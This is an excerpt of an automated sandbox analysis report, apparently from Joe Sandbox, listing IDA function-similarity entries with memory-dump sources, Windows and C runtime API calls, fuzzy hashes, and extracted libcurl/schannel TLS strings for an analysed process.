                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastSleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1458359878-0
                                                                                                                                                                                                                                                            • Opcode ID: 9ff04fc8c4f9fda037aa5acddd014d58fc7bc8f6c0c71ee5261645a357121049
                                                                                                                                                                                                                                                            • Instruction ID: 5170cbf704b018c5f02d78ea4eb8af5a543ae3516a6316eb4f9a132cfc3b638d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ff04fc8c4f9fda037aa5acddd014d58fc7bc8f6c0c71ee5261645a357121049
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7D02230A261328393291FA8AD4C803AA989F08BF03020200FC12F72E0C730CC008BA0
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: mallocmemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2882185209-0
                                                                                                                                                                                                                                                            • Opcode ID: 7dc62a39f7c49f7050c512ff4b13e75f7016302f30f699fd660f3f072f6626ab
                                                                                                                                                                                                                                                            • Instruction ID: aed3cf3ed25ea98270f5b3e8cadcd4220bc69082ac4447084f11ecba0bf68a3a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dc62a39f7c49f7050c512ff4b13e75f7016302f30f699fd660f3f072f6626ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC018F7160D3518BD702BF5998C065BBBE6BB84748F2285BDEC8487321D334CC418B92
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • closesocket.WS2_32(0024A76E), ref: 0024502B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: closesocket
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2781271927-0
                                                                                                                                                                                                                                                            • Opcode ID: 15480e7d6b8c544c42e7ca9ee9eb98d770dc2ac412666f069c503b82c617a0d6
                                                                                                                                                                                                                                                            • Instruction ID: 991b7d1b43e004fd840b3266abab0031775a36d7db5ffbabeb4071a347cb17d8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15480e7d6b8c544c42e7ca9ee9eb98d770dc2ac412666f069c503b82c617a0d6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD01F979620532BBD7291F20EC097CABB61FF09356F040020F44411162EB736874CFE1
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: realloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 471065373-0
                                                                                                                                                                                                                                                            • Opcode ID: 8358a41f7df2dd170d68c461b57e14e040aa90801ac25c5d30adedd79d47147f
                                                                                                                                                                                                                                                            • Instruction ID: e68042fa7ca84461cdac3a213555b87d51d8576577332b5c600be8fcf671c7b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8358a41f7df2dd170d68c461b57e14e040aa90801ac25c5d30adedd79d47147f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15F0EC78A229139BEB669F24C889765F6A1FB08306F540135CE0A97201D334B8388BD8
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • socket.WS2_32(00000017,00000002,00000000), ref: 0024A751
                                                                                                                                                                                                                                                              • Part of subcall function 00244FF0: closesocket.WS2_32(0024A76E), ref: 0024502B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: closesocketsocket
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2760038618-0
                                                                                                                                                                                                                                                            • Opcode ID: d9820fc89593581951833b5a316518c779070e7e78d5ecb294192d9210839ad7
                                                                                                                                                                                                                                                            • Instruction ID: fabda3d392cb488b92ce71845d48acdd333ac7de221b714a7f4a48ed89b8e205
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9820fc89593581951833b5a316518c779070e7e78d5ecb294192d9210839ad7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90E080342551415BF71C5F21ACDAB7C33615781724F10033CF92B994E0DBF058584715
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Cleanup
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 99945797-0
                                                                                                                                                                                                                                                            • Opcode ID: fee4518e0a1107db7e65c095006c541115210724d5aa8445907f43affe4b5195
                                                                                                                                                                                                                                                            • Instruction ID: 68fb284b53ee071124f35a5349d20a5880c649dd90b27398459c0e38a53430e8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fee4518e0a1107db7e65c095006c541115210724d5aa8445907f43affe4b5195
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E0123852594246C728BF7AEC4731CBAD4AB18384F941414EC06E9162DE34847E9F19
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _beginthreadex
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3014514943-0
                                                                                                                                                                                                                                                            • Opcode ID: 432a315b4f11aaca3ef0cef031b2c6a9a5f0ae8bc861dc659aa296bdf3804092
                                                                                                                                                                                                                                                            • Instruction ID: fda49ea2e84fae1bdc64aa8566cb2db01b393feeccf9f4f45de37f848f72a1be
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 432a315b4f11aaca3ef0cef031b2c6a9a5f0ae8bc861dc659aa296bdf3804092
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFD01231344781ABEF155A744C16B1D35D0AF84B16F340A1CFB33D80E0D751D4246646
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ioctlsocket.WS2_32(00000000,8004667E), ref: 0024C48B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ioctlsocket
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3577187118-0
                                                                                                                                                                                                                                                            • Opcode ID: d29419cc2c886325e03f7ff874091122c7dc5e913ed143188017ffa4a1d4175c
                                                                                                                                                                                                                                                            • Instruction ID: dd4c57dff9fd4a4c798a60908f39df9eaa55c6f0b15f5b4fc3af2de75f5e799f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d29419cc2c886325e03f7ff874091122c7dc5e913ed143188017ffa4a1d4175c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83C012F1108600EFD7084B24D849A5E77E8DB48266F01442CF046D2190DB349494DF16
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,00243C05), ref: 0024C11A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3664257935-0
                                                                                                                                                                                                                                                            • Opcode ID: d16442fefa0d886fcf0347a3da9518043bab60bed520e0442646050d6b6a0c9a
                                                                                                                                                                                                                                                            • Instruction ID: 8a70d46c5d3a80286e51c7e461f316b3a7357cf305e8c057645d5cbd3b9ad57c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d16442fefa0d886fcf0347a3da9518043bab60bed520e0442646050d6b6a0c9a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1C04CBC1016018BEB008F56EC987127BACA720748F946215DC06E61B0CB79845DEF14
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2221118986-0
                                                                                                                                                                                                                                                            • Opcode ID: eb64251b68fbb6d12823ec19976ec87119320c2edec31729565ea99aa55ce0ec
                                                                                                                                                                                                                                                            • Instruction ID: 72ced2b6b70e223556a89ba7a7e836d8bf46a0010410bdb63701718f980efe78
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb64251b68fbb6d12823ec19976ec87119320c2edec31729565ea99aa55ce0ec
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C35113B5A04301CFDB18DF19C48165ABBE1FF88314F1689ADE8988B315E774E949CF92
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • calloc.MSVCRT(00000001,00001128,?,?,00000000,00243C49,?,00000000,00239B7E), ref: 002683FA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: calloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2635317215-0
                                                                                                                                                                                                                                                            • Opcode ID: b86b2d43f13cc5c240a3125b8afff86c0cdfcf2e9ad92769e66647ed27587f75
                                                                                                                                                                                                                                                            • Instruction ID: 9025dbefeabf0606ac1760e53ced71e8de6aedd323f6c7d05d9e1e00df88a363
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b86b2d43f13cc5c240a3125b8afff86c0cdfcf2e9ad92769e66647ed27587f75
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A41BCF05107028BE720AF34ED497D77AF0AF4030DF080938E56F56292EB75A568CB96
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • CALG_RC2, xrefs: 0025B428
                                                                                                                                                                                                                                                            • schannel: failed to store credential handle, xrefs: 0025B900
                                                                                                                                                                                                                                                            • CALG_PCT1_MASTER, xrefs: 0025B5A6
                                                                                                                                                                                                                                                            • schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 0025B91B
                                                                                                                                                                                                                                                            • schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates., xrefs: 0025AE64
                                                                                                                                                                                                                                                            • schannel: Failed to open cert store %x %s, last error is %x, xrefs: 0025BCF6
                                                                                                                                                                                                                                                            • CALG_SEAL, xrefs: 0025B454
                                                                                                                                                                                                                                                            • SSL/TLS connection timeout, xrefs: 0025A818
                                                                                                                                                                                                                                                            • CALG_SHA_256, xrefs: 0025B6C4
                                                                                                                                                                                                                                                            • Services, xrefs: 0025B7DC
                                                                                                                                                                                                                                                            • CALG_SHA1, xrefs: 0025B34C
                                                                                                                                                                                                                                                            • schannel: SSL/TLS connection with %s port %hu (step 2/3), xrefs: 00259E84
                                                                                                                                                                                                                                                            • CALG_MD5, xrefs: 0025B31B
                                                                                                                                                                                                                                                            • CALG_AES_256, xrefs: 0025B690
                                                                                                                                                                                                                                                            • CALG_SSL3_MASTER, xrefs: 0025B53E
                                                                                                                                                                                                                                                            • schannel: incremented credential handle refcount = %d, xrefs: 0025AA64
                                                                                                                                                                                                                                                            • CALG_TLS1PRF, xrefs: 0025B628
                                                                                                                                                                                                                                                            • CALG_SCHANNEL_MAC_KEY, xrefs: 0025B572
                                                                                                                                                                                                                                                            • Users, xrefs: 0025B7F3
                                                                                                                                                                                                                                                            • schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 0025A865
                                                                                                                                                                                                                                                            • CALG_HMAC, xrefs: 0025B60E
                                                                                                                                                                                                                                                            • CALG_SCHANNEL_MASTER_HASH, xrefs: 0025B558
                                                                                                                                                                                                                                                            • CALG_SKIPJACK, xrefs: 0025B4D6
                                                                                                                                                                                                                                                            • Unable to set ciphers to passed via SSL_CONN_CONFIG, xrefs: 0025BD2B
                                                                                                                                                                                                                                                            • CALG_TLS1_MASTER, xrefs: 0025B5DA
                                                                                                                                                                                                                                                            • schannel: re-using existing credential handle, xrefs: 0025AA42
                                                                                                                                                                                                                                                            • CALG_RC4, xrefs: 0025B43E
                                                                                                                                                                                                                                                            • LocalMachineEnterprise, xrefs: 0025B838
                                                                                                                                                                                                                                                            • schannel: received incomplete message, need more data, xrefs: 0025A653
                                                                                                                                                                                                                                                            • CALG_AES, xrefs: 0025B6AA
                                                                                                                                                                                                                                                            • schannel: failed to retrieve remote cert context, xrefs: 0025B9EB
                                                                                                                                                                                                                                                            • schannel: SSL/TLS connection with %s port %hu (step 1/3), xrefs: 0025A843
                                                                                                                                                                                                                                                            • schannel: checking server certificate revocation, xrefs: 0025AE45
                                                                                                                                                                                                                                                            • CurrentUser, xrefs: 0025B797
                                                                                                                                                                                                                                                            • CurrentService, xrefs: 0025B7C5
                                                                                                                                                                                                                                                            • CALG_MD2, xrefs: 0025B2EF
                                                                                                                                                                                                                                                            • schannel: SSL/TLS handshake complete, xrefs: 0025A425
                                                                                                                                                                                                                                                            • CurrentUserGroupPolicy, xrefs: 0025B80A
                                                                                                                                                                                                                                                            • schannel: Failed to read remote certificate context: %s, xrefs: 0025A58B
                                                                                                                                                                                                                                                            • schannel: sending initial handshake data: sending %lu bytes..., xrefs: 0025ABC4
                                                                                                                                                                                                                                                            • schannel: unable to allocate memory, xrefs: 0025A35E, 0025A388, 0025A3E8, 0025AD00, 0025BC90
                                                                                                                                                                                                                                                            • CALG_DSS_SIGN, xrefs: 0025B38E
                                                                                                                                                                                                                                                            • CALG_HASH_REPLACE_OWF, xrefs: 0025B642
                                                                                                                                                                                                                                                            • CALG_RSA_SIGN, xrefs: 0025B378
                                                                                                                                                                                                                                                            • schannel: sending next handshake data: sending %lu bytes..., xrefs: 0025A12C, 0025A196, 0025A200
                                                                                                                                                                                                                                                            • CALG_TEK, xrefs: 0025B4F0
                                                                                                                                                                                                                                                            • CALG_MD4, xrefs: 0025B305
                                                                                                                                                                                                                                                            • CALG_SHA_384, xrefs: 0025B6DE
                                                                                                                                                                                                                                                            • Microsoft Unified Security Protocol Provider, xrefs: 0025BC07
                                                                                                                                                                                                                                                            • schannel: failed to setup stream orientation, xrefs: 0025ADDD
                                                                                                                                                                                                                                                            • schannel: failed to setup replay detection, xrefs: 0025ADF9
                                                                                                                                                                                                                                                            • schannel: initial InitializeSecurityContext failed: %s, xrefs: 0025AD88, 0025AF80
                                                                                                                                                                                                                                                            • CALG_HUGHES_MD5, xrefs: 0025B4BC
                                                                                                                                                                                                                                                            • CALG_RC5, xrefs: 0025B5F4
                                                                                                                                                                                                                                                            • LocalMachine, xrefs: 0025B7AE
                                                                                                                                                                                                                                                            • LocalMachineGroupPolicy, xrefs: 0025B821
                                                                                                                                                                                                                                                            • schannel: failed to setup confidentiality, xrefs: 0025ADBE
                                                                                                                                                                                                                                                            • schannel: SSL/TLS connection with %s port %hu (step 3/3), xrefs: 0025A994
                                                                                                                                                                                                                                                            • schannel: unable to re-allocate memory, xrefs: 0025A381
                                                                                                                                                                                                                                                            • schannel: old credential handle is stale, removing, xrefs: 0025B8BE
